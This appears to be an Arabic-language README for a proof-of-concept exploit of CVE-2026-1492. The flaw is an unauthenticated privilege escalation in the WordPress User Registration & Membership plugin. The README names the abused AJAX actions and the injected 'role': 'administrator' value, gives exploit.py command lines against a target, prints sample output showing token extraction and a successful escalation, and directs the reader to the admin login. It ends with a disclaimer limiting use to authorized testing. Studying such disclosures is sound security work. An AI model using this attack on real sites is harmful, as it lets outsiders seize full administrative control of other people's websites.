
إثبات مفهوم لاستغلال CVE-2026-1492 في إضافة تسجيل المستخدمين في ووردبريس، مما يتيح تصعيد الامتيازات غير المصادق عليه إلى مسؤول عبر تسجيل عضوية مُصمم بعناية.
يحتوي هذا المستودع على برهان إثبات (PoC) لاستغلال CVE-2026-1492، وهي ثغرة حرجة تؤثر على إضافة User Registration & Membership في ووردبريس.
تسمح الثغرة للمهاجمين غير المصادق عليهم بإنشاء حسابات مسؤول من خلال إساءة استخدام عملية تسجيل العضوية.
👉 التحليل الفني الكامل لهذه الثغرة متاح هنا:
التحليل الفني
يشرح خطوة بخطوة كيفية معالجة الخادم الخلفي للبيانات التي يتحكم بها المهاجم ولماذا يكون تصعيد الصلاحيات ممكنًا.
تثق الإضافة بشكل غير سليم في المدخلات التي يتحكم بها المستخدم أثناء عملية تسجيل العضوية.
تحديدًا:
role مقدمة من المستخدموهذا يسمح للمهاجمين بتعيين:
"role": "administrator"
والحصول على وصول إداري كامل.
الاستغلال الناجح يسمح بـ:
يتم تشغيل الثغرة عبر عملية AJAX متعددة الخطوات:
user_registration_user_form_submituser_registration_membership_register_memberadministrator)python3 exploit.py -t http://target -ru 'http://target/?page_id=6'
python3 exploit.py -t http://localhost:5000 -ru 'http://localhost:5000/?page_id=6'
[*] Extracting tokens...
[+] form_id: 5
[+] frontend_nonce: XXXXX
[+] security: XXXXX
[+] wpnonce: XXXXX
[+] membership_id: 12
[*] Sending registration request...
[+] User created
[*] Sending membership request...
[+] Privilege escalation successful
سجّل الدخول باستخدام بيانات الاعتماد المُنشأة:
http://target/wp-login.php
ثم الوصول إلى لوحة الإدارة:
http://target/wp-admin/
ملاحظة: قد يكون مسار الإدارة مخصصًا.
هذا الاستغلال مقدم لأغراض تعليمية وللاختبارات الأمنية المصرح بها فقط.
لا تستخدمه ضد أنظمة دون إذن.